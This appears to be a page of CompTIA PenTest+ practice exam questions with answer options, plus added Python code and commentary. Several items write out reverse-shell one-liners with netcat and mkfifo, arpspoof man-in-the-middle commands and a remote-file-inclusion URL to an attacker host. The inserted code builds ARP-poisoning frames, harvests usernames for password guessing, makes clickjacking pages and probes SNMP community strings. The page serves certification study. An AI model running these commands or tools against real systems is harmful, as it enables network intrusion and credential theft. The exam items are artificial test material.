  • Exam Name: CompTIA PenTest+ Exam
  • Last Update: Aug 14, 2022
  • Questions and Answers: 294

PT0-001 CompTIA PenTest+ Exam Questions and Answers

Question # 6

A recent vulnerability scan of all web servers in an environment offers the following results:

[vulnerability scan results image not reproduced]

Taking a risk-based approach, which of the following is the BEST order to approach remediation based on exposure?

A.

Unrestricted file upload, clickjacking, verbose server banner, SQL injection

B.

Unrestricted file upload, SQL injection, clickjacking, verbose server banner

C.

Clickjacking, unrestricted file upload, verbose server banner, SQL injection

D.

SQL injection, unrestricted file upload, clickjacking, verbose server banner

E.

SQL injection, clickjacking, unrestricted file upload, verbose server banner

Question # 7

For which of the following reasons does a penetration tester need to have a customer's point-of-contact information available at all times? (Select THREE).

A.

To report indicators of compromise

B.

To report findings that cannot be exploited

C.

To report critical findings

D.

To report the latest published exploits

E.

To update payment information

F.

To report a server that becomes unresponsive

G.

To update the statement of work

Question # 8

Prior to a security assessment of a company's user population via spear phishing, which of the following is the MOST appropriate method to de-escalate any incidents or consequences?

A.

Determine the appropriate format and content of the spear-phishing emails.

B.

Send follow-up communication to spear-phishing targets to notify of the assessment.

C.

Carefully prioritize the list of targeted users, excluding high value targets.

D.

Provide limited but necessary communication prior to the assessment.

Question # 9

A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:

IP: 192.168.1.20

NETMASK: 255.255.255.0

DEFAULT GATEWAY: 192.168.1.254

DHCP: 192.168.1.253

DNS: 192.168.10.10, 192.168.20.10

Which of the following commands should the malicious user execute to perform the MITM attack?

A.

arpspoof -c both -r -t 192.168.1.1 192.168.1.20

B.

arpspoof -t 192.168.1.20 192.168.1.254

C.

arpspoof -c both -t 192.168.1.20 192.168.1.253

D.

arpspoof -r -t 192.168.1.253 192.168.1.20
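Every arpspoof invocation above wraps the same primitive: a forged ARP reply that tells the victim (192.168.1.20) that the gateway's IP (192.168.1.254, not the DHCP or DNS servers) maps to the attacker's MAC, and with -r tells the gateway the same about the victim, so both directions of traffic cross the attacker's box. The following Python is an added example, not code from the page or from arpspoof, that builds and decodes those two frames; the MAC addresses are invented for illustration, and send_frames() needs a Linux raw socket with CAP_NET_RAW so it is not executed here.

```python
import socket
import struct
from ipaddress import IPv4Address

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac: str) -> bytes:
    """'aa:bb:cc:dd:ee:ff' -> 6 raw bytes."""
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet + ARP reply (42 bytes) telling target_ip that sender_ip is at sender_mac.
    A poisoning reply is exactly this frame with a sender_mac that is not the real owner."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=Ethernet(1), ptype=IPv4(0x0800), hlen=6, plen=4, opcode=reply(2)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + IPv4Address(sender_ip).packed
    arp += mac_bytes(target_mac) + IPv4Address(target_ip).packed
    return eth + arp


def mitm_frames(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """The two replies a bidirectional poison (arpspoof -r) keeps sending: the victim
    learns 'gateway_ip is at attacker_mac' and the gateway learns 'victim_ip is at
    attacker_mac', so traffic in both directions passes through the attacker."""
    to_victim = arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


def parse_arp(frame: bytes) -> dict:
    """Decode the fields a detector compares against the known gateway MAC."""
    if len(frame) != 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an Ethernet/ARP frame")
    return {
        "opcode": struct.unpack("!H", frame[20:22])[0],
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": str(IPv4Address(frame[28:32])),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": str(IPv4Address(frame[38:42])),
    }


def send_frames(iface: str, frames, repeat: int = 1):
    """Put the frames on the wire (Linux, needs CAP_NET_RAW). arpspoof resends every
    couple of seconds because the victim's cache entry would otherwise expire and be
    re-learned correctly from the real gateway."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP)) as s:
        s.bind((iface, 0))
        for _ in range(repeat):
            for frame in frames:
                s.send(frame)


if __name__ == "__main__":
    # IPs from the question; MAC addresses are made up for the demonstration.
    to_victim, to_gateway = mitm_frames("00:11:22:33:44:55",
                                        "aa:bb:cc:00:00:20", "192.168.1.20",
                                        "aa:bb:cc:00:02:54", "192.168.1.254")
    print(parse_arp(to_victim))
    print(parse_arp(to_gateway))
```

Poisoning the DHCP server (192.168.1.253) instead of the gateway would only intercept lease renewals; the victim's browsing goes to 192.168.1.254, so that is the address the spoofed reply must claim. Remember to enable IP forwarding on the attacking host, otherwise the victim simply loses connectivity instead of being silently relayed.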

Question # 10

A company has engaged a penetration tester to perform an assessment for an application that resides in the company’s DMZ. Prior to conducting testing, in which of the following solutions should the penetration tester’s IP address be whitelisted?

A.

WAF

B.

HIDS

C.

NIDS

D.

DLP

Question # 11

A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?

A.

Perform an HTTP downgrade attack.

B.

Harvest the user credentials to decrypt traffic.

C.

Perform an MITM attack.

D.

Implement a CA attack by impersonating trusted CAs.

Question # 12

An internal network penetration test is conducted against a network that is protected by an unknown NAC system. In an effort to bypass the NAC restrictions, the penetration tester spoofs the MAC address and hostname of an authorized system. Which of the following devices, if impersonated, would be MOST likely to provide the tester with network access?

A.

Network-attached printer

B.

Power-over-Ethernet injector

C.

User workstation

D.

Wireless router

Question # 13

When considering threat actor scoping prior to an engagement, which of the following characteristics makes an APT challenging to emulate?

A.

Development of custom zero-day exploits and tools

B.

Leveraging the dark net for non-attribution

C.

Tenacity and efficacy of social engineering attacks

D.

Amount of bandwidth available for DoS attacks

Question # 14

A penetration tester discovers SNMP on some targets. Which of the following should the penetration tester try FIRST?

A.

Sniff SNMP traffic.

B.

Use default credentials.

C.

Upload a new config file.

D.

Conduct a MITM.

Question # 15

Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when performing a penetration test?

A.

Penetration test findings often contain company intellectual property

B.

Penetration test findings could lead to consumer dissatisfaction if made public

C.

Penetration test findings are legal documents containing privileged information

D.

Penetration test findings can assist an attacker in compromising a system

Question # 16

A penetration tester identifies prebuilt exploit code containing Windows imports for VirtualAllocEx and LoadLibraryA functions. Which of the following techniques is the exploit code using?

A.

DLL hijacking

B.

DLL sideloading

C.

DLL injection

D.

DLL function hooking

Question # 17

After successfully enumerating users on an Active Directory domain controller using enum4linux, a penetration tester wants to conduct a password-guessing attack. Given the below output:

[enum4linux output image not reproduced]

Which of the following can be used to extract usernames from the above output prior to conducting the attack?

A.

cat enum4linux_output.txt > grep -v user | sed 's/\[//' | sed 's/\]//' 2> usernames.txt

B.

grep user enum4linux_output.txt | awk '{print $1}' | cut -d[ -f2 | cut -d] -f1 > username.txt

C.

grep -i rid < enum4linux_output.txt | cut -d: -f2 | cut -d] -f1 > usernames.txt

D.

cut -d: -f2 enum4linux_output.txt | awk '{print $2}' | cut -d: -f1 > usernames.txt
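The pipelines above all key off the line format enum4linux prints for each account, user:[NAME] rid:[0xRID], and only the one that isolates the text between the first "[" and "]" yields a clean username list. The following Python is an added example, not from the page or from enum4linux, that does the same extraction with a little more care: it also reads the querydispinfo "index: ... Account: NAME" lines, de-duplicates, and lets the tester drop the well-known RIDs (500 Administrator, 501 Guest, 502 krbtgt) that are usually not worth burning guesses on. The sample output is constructed for the example, not the image from the question.

```python
import re
from typing import List, Tuple

# Constructed sample in the two formats enum4linux emits for users
# (querydispinfo "index:" lines and enumdomusers "user:[...] rid:[...]" lines).
ENUM4LINUX_OUTPUT = """\
 ============================== 
|    Users on 192.168.1.10     |
 ============================== 
index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator\tName: (null)\tDesc: Built-in account for administering the computer/domain
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[svc_backup] rid:[0x450]
user:[j.smith] rid:[0x451]
user:[j.smith] rid:[0x451]
"""

USER_LINE = re.compile(r"^user:\[(?P<name>[^\]]+)\]\s+rid:\[(?P<rid>0x[0-9a-f]+)\]", re.M | re.I)
ACCOUNT_LINE = re.compile(r"^index:\s+\S+\s+RID:\s+(?P<rid>0x[0-9a-f]+).*?Account:\s+(?P<name>\S+)",
                          re.M | re.I)


def extract_users(output: str) -> List[Tuple[str, int]]:
    """Return (username, rid) pairs, de-duplicated case-insensitively, in first-seen order."""
    seen = {}
    for rx in (USER_LINE, ACCOUNT_LINE):
        for m in rx.finditer(output):
            name, rid = m.group("name"), int(m.group("rid"), 16)
            seen.setdefault(name.lower(), (name, rid))
    return list(seen.values())


def candidate_usernames(users, include_builtin: bool = False) -> List[str]:
    """RIDs below 1000 are well-known built-ins; user-created accounts start at
    1000 (0x3e8), which is normally where a password-guessing list should start."""
    return [name for name, rid in users if include_builtin or rid >= 1000]


def write_wordlist(names: List[str], path: str) -> int:
    """One username per line, the format tools such as Hydra or CrackMapExec expect."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(names) + "\n")
    return len(names)


if __name__ == "__main__":
    users = extract_users(ENUM4LINUX_OUTPUT)
    print(users)
    print(candidate_usernames(users))
```

Before running any guessing attack against the extracted names, pull the domain password policy (enum4linux -P) and stay under the lockout threshold; locking out a domain's service accounts is the kind of incident the point of contact wants to hear about before it happens.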

Question # 18

During the information gathering phase, a penetration tester discovers a spreadsheet that contains a domain administrator's credentials. In addition, port scanning reveals that TCP port 445 was open on multiple hosts. Which of the following methods would BEST leverage this information?

A.

telnet [target IP] 445

B.

ncat [target IP] 445

C.

nbtstat -a [targetIP] 445

D.

psexec [target IP]

Question # 19

Which of the following can be used to perform online password attacks against RDP?

A.

Hashcat

B.

John the Ripper

C.

Aircrack-ng

D.

Ncrack

Question # 20

When communicating the findings of a network vulnerability scan to a client's IT department, which of the following metrics BEST prioritize the severity of the findings? (Select TWO)

A.

Threat map statistics

B.

CVSS scores

C.

Versions of affected software

D.

Media coverage prevalence

E.

Impact criticality

F.

Ease of remediation

Question # 21

A security consultant found a SCADA device in one of the VLANs in scope. Which of the following actions would BEST create a potentially destructive outcome against the device?

A.

Launch an SNMP password brute force attack against the device.

B.

Launch a Nessus vulnerability scan against the device.

C.

Launch a DNS cache poisoning attack against the device.

D.

Launch an SMB exploit against the device.

Question # 22

After successfully exploiting a local file inclusion vulnerability within a web application, a limited reverse shell is spawned back to the penetration tester's workstation. Which of the following can be used to escape the limited shell and create a fully functioning TTY?

A.

perl -e ':set shell=/bin/bash:shell'

B.

php -r '$shell=fshellopen("/bin/bash");exec($shell)'

C.

bash -i >& /dev/localhost 0>&1

D.

python -c 'import pty;pty.spawn("/bin/bash")'

Question # 23

Performance based

You are a penetration tester reviewing a client's website through a web browser.

Instructions:

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate source or cookies.

[website screenshots (certificate details and cookies) not reproduced]

Question # 24

A penetration tester observes that several high numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?

A.

Transition the application to another port

B.

Filter port 443 to specific IP addresses

C.

Implement a web application firewall

D.

Disable unneeded services.

Question # 25

A web application scanner reports that a website is susceptible to clickjacking. Which of the following techniques would BEST prove exploitability?

A.

Redirect the user with a CSRF.

B.

Launch the website in an iframe.

C.

Pull server headers.

D.

Capture and replay a session ID.
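A scanner flags clickjacking whenever it sees no anti-framing header; proving it means actually framing the page from a foreign origin. The following Python is an added example, not part of the page, that makes the same decision from a response's headers before building the proof-of-concept page: CSP frame-ancestors takes precedence over X-Frame-Options when both are present, an X-Frame-Options value other than DENY or SAMEORIGIN (including the withdrawn ALLOW-FROM) is ignored by current browsers and so gives no protection, and a Content-Security-Policy-Report-Only header enforces nothing. The attacker origin https://attacker.example is a placeholder.

```python
from urllib.parse import urlsplit


def framing_allowed(headers: dict, attacker_page: str = "https://attacker.example/poc.html"):
    """Return (frameable, reason) for attacker_page trying to frame a response
    that carried these headers. Only the enforcing CSP header is consulted."""
    h = {k.lower(): v for k, v in headers.items()}
    attacker = urlsplit(attacker_page)
    origin = f"{attacker.scheme}://{attacker.netloc}".lower()
    host = (attacker.hostname or "").lower()

    # 1. CSP frame-ancestors wins over X-Frame-Options whenever it is present.
    for directive in h.get("content-security-policy", "").split(";"):
        tokens = directive.split()
        if not tokens or tokens[0].lower() != "frame-ancestors":
            continue
        sources = [t.lower() for t in tokens[1:]]
        if not sources or sources == ["'none'"]:
            return False, "CSP frame-ancestors 'none'"
        for s in sources:
            if (s == "*" or s in (origin, host)
                    or (s.endswith(":") and origin.startswith(s))      # scheme-source, e.g. https:
                    or (s.startswith("*.") and host.endswith(s[1:]))):  # wildcard host
                return True, f"CSP frame-ancestors permits {s}"
        return False, f"CSP frame-ancestors limited to {' '.join(sources)}"

    # 2. Otherwise fall back to X-Frame-Options; a list containing DENY or SAMEORIGIN blocks
    #    a cross-origin framer, anything else is treated as absent by modern browsers.
    values = [v.strip().upper() for v in h.get("x-frame-options", "").split(",") if v.strip()]
    if "DENY" in values or "SAMEORIGIN" in values:
        return False, f"X-Frame-Options {','.join(values)}"
    if values:
        return True, f"X-Frame-Options '{','.join(values)}' is not honoured by modern browsers"
    return True, "no framing restriction at all"


def clickjacking_poc(target_url: str, opacity: float = 0.0) -> str:
    """Minimal PoC: the target is framed almost transparently over a decoy button, so the
    victim's click lands on whatever sits at that position in the target page."""
    return f"""<!doctype html>
<title>clickjacking PoC</title>
<style>
  iframe {{ position:absolute; top:0; left:0; width:800px; height:600px; opacity:{opacity}; z-index:2; }}
  button {{ position:absolute; top:300px; left:350px; z-index:1; }}
</style>
<button>Claim your prize</button>
<iframe src="{target_url}"></iframe>
"""


if __name__ == "__main__":
    print(framing_allowed({"X-Frame-Options": "DENY"}))
    print(framing_allowed({"Content-Security-Policy": "frame-ancestors 'self'"}))
    print(framing_allowed({}))
```

Serve the PoC from a different origin than the target when demonstrating it, since a same-origin frame proves nothing; raise the opacity to something visible for the screenshot that goes in the report.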

Question # 26

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:

https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php

Which of the following remediation steps should be taken to prevent this type of attack?

A.

Implement a blacklist.

B.

Block URL redirections.

C.

Double URL encode the parameters.

D.

Stop external calls from the application.

Question # 27

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO)

A.

nc 192.168.1.5 44444

B.

nc -nlvp 4444 -e /bin/sh

C.

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.5 44444 >/tmp/f

D.

nc -e /bin/sh 192.168.1.5 4444

E.

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.5 444444 >/tmp/f

F.

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.5.1 44444 >/tmp/f

Question # 28

A penetration tester directly connects to an internal network. Which of the following exploits would work BEST for quick lateral movement within an internal network?

A.

Crack password hashes in /etc/shadow for network authentication.

B.

Launch dictionary attacks on RDP.

C.

Conduct a whaling campaign.

D.

Poison LLMNR and NBNS requests.

Question # 29

While prioritizing findings and recommendations for an executive summary, which of the following considerations would be MOST valuable to the client?

A.

Levels of difficulty to exploit identified vulnerabilities

B.

Time taken to accomplish each step

C.

Risk tolerance of the organization

D.

Availability of patches and remediations

Question # 30

Which of the following is the purpose of an NDA?

A.

Outlines the terms of confidentiality between both parties

B.

Outlines the boundaries of which systems are authorized for testing

C.

Outlines the requirements of technical testing that are allowed

D.

Outlines the detailed configuration of the network

Question # 31


Which of the following is the MOST comprehensive type of penetration test on a network?

A.

Black box

B.

White box

C.

Gray box

D.

Red team

E.

Architecture review

Question # 32

Instructions:

Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

[list of flagged HTTP payloads image not reproduced]

Question # 33

A penetration tester has SSH access to a Linux server that is exposed to the internet and has access to a corporate internal network. This server, with IP address 200.111.111.9, only has port TCP 22 externally opened. The penetration tester also discovered the internal IP address 192.168.1.5 from a Windows server. Which of the following steps should the penetration tester follow to open an RDP connection to this Windows server and to try to log on?

A.

Connect to the Linux server using # ssh 200.111.111.9, establish an RDP connection to the 192.168.1.5 address.

B.

Connect to the Windows server using # ssh -L 3389:200.111.111.9:22 192.168.1.5.

C.

Connect to the Linux server using # ssh -L 3389:192.168.1.5:3389 200.111.111.9; RDP to localhost address, port 3389.

D.

Connect to the Windows server using # ssh -L 22:200.111.111.9:3389 192.168.1.5.

Question # 34

A penetration tester is assessing the security of a web form for a client and enters “;id” in one of the fields.

The penetration tester observes the following response:

[application response image not reproduced]

Based on the response, which of the following vulnerabilities exists?

A.

SQL injection

B.

Session hijacking

C.

Command injection

D.

XSS/XSRF

Question # 35

A penetration tester successfully exploits a Windows host and dumps the hashes. Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?

A) [hash dump image not reproduced]

B) [hash dump image not reproduced]

C) [hash dump image not reproduced]

D) [hash dump image not reproduced]

A.

Option A

B.

Option B

C.

Option C

D.

Option D

Question # 36

A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the web application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance?

A.

Document the findings with an executive summary, recommendations, and screenshots of the web application disclosure.

B.

Connect to the SQL server using this information and change the password to one or two non-critical accounts to demonstrate a proof--of-concept to management.

C.

Notify the development team of the discovery and suggest that input validation be implemented with a professional penetration testing company.

D.

Request that management create an RFP to begin a formal engagement with a professional penetration testing company.

Question # 37

Which of the following should a penetration tester verify prior to testing the login and permissions management for a web application that is protected by a CDN-based WAF?

A.

If an NDA is signed with the CDN company

B.

If the SSL certificates for the web application are valid

C.

If a list of the applicable WAF rules was obtained

D.

If the IP addresses for the penetration tester are whitelisted on the WAF

Question # 38

After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the attacker's actual fingerprint without exploitation. Which of the following is the MOST likely explanation of what happened?

A.

The biometric device is tuned more toward false positives

B.

The biometric device is configured more toward true negatives

C.

The biometric device is set to fail closed

D.

The biometric device duplicated a valid user's fingerprint.

Question # 39

A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?

A.

Sample SOAP messages

B.

The REST API documentation

C.

A protocol fuzzing utility

D.

An applicable XSD file

Question # 40

An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email to obtain the CEO's login credentials. Which of the following types of attacks is this an example of?

A.

Elicitation attack

B.

Impersonation attack

C.

Spear phishing attack

D.

Drive-by download attack

Question # 41

A penetration tester is exploiting the use of default public and private community strings. Which of the following protocols is being exploited?

A.

SMTP

B.

DNS

C.

SNMP

D.

HTTP
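In SNMPv1 and v2c the community string is the only credential, so "try default credentials first" (the situation in Question 14 as well as this one) means sending a get-request with public or private and seeing whether the agent answers at all; an agent drops requests carrying a wrong community silently. The following Python is an added example, not code from the page or from any SNMP tool, that hand-encodes that request in BER, parses the response, and wraps both in a small probe. The target address 192.0.2.10 is a placeholder and probe() is not run here; only the encoder and parser are exercised.

```python
import socket


def ber_len(n: int) -> bytes:
    """BER length: short form below 128, else 0x80|count followed by big-endian bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, payload: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(payload)) + payload


def ber_int(value: int) -> bytes:
    """Non-negative INTEGER; the extra byte keeps the sign bit clear (128 -> 00 80)."""
    return tlv(0x02, value.to_bytes(value.bit_length() // 8 + 1, "big"))


def ber_oid(oid: str) -> bytes:
    """OBJECT IDENTIFIER: first two arcs packed into one byte, the rest base-128."""
    arcs = [int(a) for a in oid.strip(".").split(".")]
    out = bytes([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out += bytes(reversed(chunk))
    return tlv(0x06, out)


def snmp_get(community: str, oid: str = "1.3.6.1.2.1.1.1.0", request_id: int = 1) -> bytes:
    """SNMPv1 GetRequest for sysDescr.0 carrying the given community string."""
    varbind = tlv(0x30, ber_oid(oid) + b"\x05\x00")                 # OID + NULL placeholder value
    pdu = tlv(0xA0, ber_int(request_id) + ber_int(0) + ber_int(0)    # GetRequest, err-status, err-index
              + tlv(0x30, varbind))
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode()) + pdu)  # version 0 = SNMPv1


def decode_tlv(data: bytes, pos: int = 0):
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(data[pos:pos + n], "big"), pos + n
    return tag, data[pos:pos + length], pos + length


def parse_response(data: bytes):
    """Return (community, error_status) from a GetResponse; status 0 means the agent served it."""
    _, msg, _ = decode_tlv(data)
    _, _version, pos = decode_tlv(msg)
    _, community, pos = decode_tlv(msg, pos)
    tag, pdu, _ = decode_tlv(msg, pos)
    if tag != 0xA2:
        raise ValueError(f"expected GetResponse (0xA2), got {tag:#x}")
    _, _req_id, pos = decode_tlv(pdu)
    _, err_status, _ = decode_tlv(pdu, pos)
    return community.decode(), int.from_bytes(err_status, "big")


def probe(host: str, communities=("public", "private"), port: int = 161, timeout: float = 1.0):
    """Send one request per community string and collect those the agent answered."""
    accepted = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        for i, community in enumerate(communities, start=1):
            s.sendto(snmp_get(community, request_id=i), (host, port))
            try:
                data, _ = s.recvfrom(4096)
            except socket.timeout:
                continue                      # silence is the normal reply to a wrong community
            name, err = parse_response(data)
            if err == 0:
                accepted.append(name)
    return accepted


if __name__ == "__main__":
    print(snmp_get("public").hex())
    print(probe("192.0.2.10"))   # placeholder address; use an in-scope target
```

A writable community (private is the usual default) is the more serious finding, since a set-request can change the device configuration; on the SCADA gear from Question 21 even the read probe should be agreed with the client first, as some embedded agents misbehave under unexpected traffic.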

Question # 42

During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?

A.

Locating emergency exits

B.

Preparing a pretext

C.

Shoulder surfing the victim

D.

Tailgating the victim

Question # 43

A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL:

http://www.company-site.com/about.php?i=../../../../../etc/passwd

Which of the following attack types is MOST likely to be the vulnerability?

A.

Directory traversal

B.

Cross-site scripting

C.

Remote file inclusion

D.

User enumeration
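The three log-review questions on this page (this one, the remote file inclusion URL in Question 26, and the ";id" response in Question 34) plus the signature-to-remediation matching in Question 32 all come down to recognising the payload shape inside a request parameter. The following Python is an added example, not code from the page, that decodes each query parameter (twice, so double-encoded traversal is not missed) and classifies it with the attack type and the corresponding fix; it goes beyond the page's cases to cover SQL injection and cross-site scripting too. The log lines are constructed for the example, with the first two copied from the questions; the remediation strings are general hardening guidance, not something the page states.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# (attack type, signature, remediation). First match wins for a given parameter.
SIGNATURES = [
    ("directory traversal",
     re.compile(r"(\.\./|\.\.\\)"),
     "canonicalize the path and allow only files from an approved directory"),
    ("remote file inclusion",
     re.compile(r"^\s*(https?|ftp)://", re.I),
     "never include by URL: map the parameter to local files via an allowlist (PHP: allow_url_include=0)"),
    ("command injection",
     re.compile(r"(;|\||&&|`|\$\()\s*\w"),
     "do not pass input to a shell; execute programs with argument arrays and validate input"),
    ("SQL injection",
     re.compile(r"('|\bunion\b\s+\bselect\b|\bor\b\s+\d+\s*=\s*\d+)", re.I),
     "use parameterized queries"),
    ("cross-site scripting",
     re.compile(r"<\s*script|\bon\w+\s*=|javascript:", re.I),
     "context-aware output encoding plus a restrictive Content-Security-Policy"),
]


def decode(value: str) -> str:
    """Undo up to two layers of percent-encoding so %252e%252e%252f is seen as ../."""
    for _ in range(2):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(url: str):
    """Return [(parameter, attack, remediation)] for every suspicious query parameter."""
    parts = urlsplit(url)
    own_host = (parts.hostname or "").lower()
    findings = []
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = decode(raw)
        for attack, rx, fix in SIGNATURES:
            if not rx.search(value):
                continue
            if attack == "remote file inclusion":
                target = (urlsplit(value).hostname or "").lower()
                if target == own_host:
                    continue   # a URL back to the same host is not remote inclusion
            findings.append((name, attack, fix))
            break
    return findings


def triage(urls):
    """Classify a batch of request URLs, keeping only those with a finding."""
    return [(u, classify_request(u)) for u in urls if classify_request(u)]


# Constructed sample log; lines 1 and 2 are the URLs quoted in the questions.
LOG = [
    "http://www.company-site.com/about.php?i=../../../../../etc/passwd",
    "https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php",
    "https://example.com/contact.php?name=bob%3Bid",
    "https://example.com/login.php?user=admin'%20OR%201=1--",
    "https://example.com/search.php?q=%3Cscript%3Ealert(1)%3C/script%3E",
    "https://example.com/page.php?id=42",
]

if __name__ == "__main__":
    for url, findings in triage(LOG):
        for param, attack, fix in findings:
            print(f"{attack:22} param={param:6} fix: {fix}\n    {url}")
```

Signature matching like this is what the WAF in Question 26 was doing, and it is a detection aid, not the fix: the remediation column is where the actual work is, and a blocklist of strings is exactly the kind of control that double encoding and alternate separators get past.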

Question # 44

Which of the following excerpts would come from a corporate policy?

A.

Employee passwords must contain a minimum of eight characters, with one being alphanumeric.

B.

The help desk can be reached at 800-passwd1 to perform password resets.

C.

Employees must use strong passwords for accessing corporate assets.

D.

The corporate systems must store passwords using the MD5 hashing algorithm.
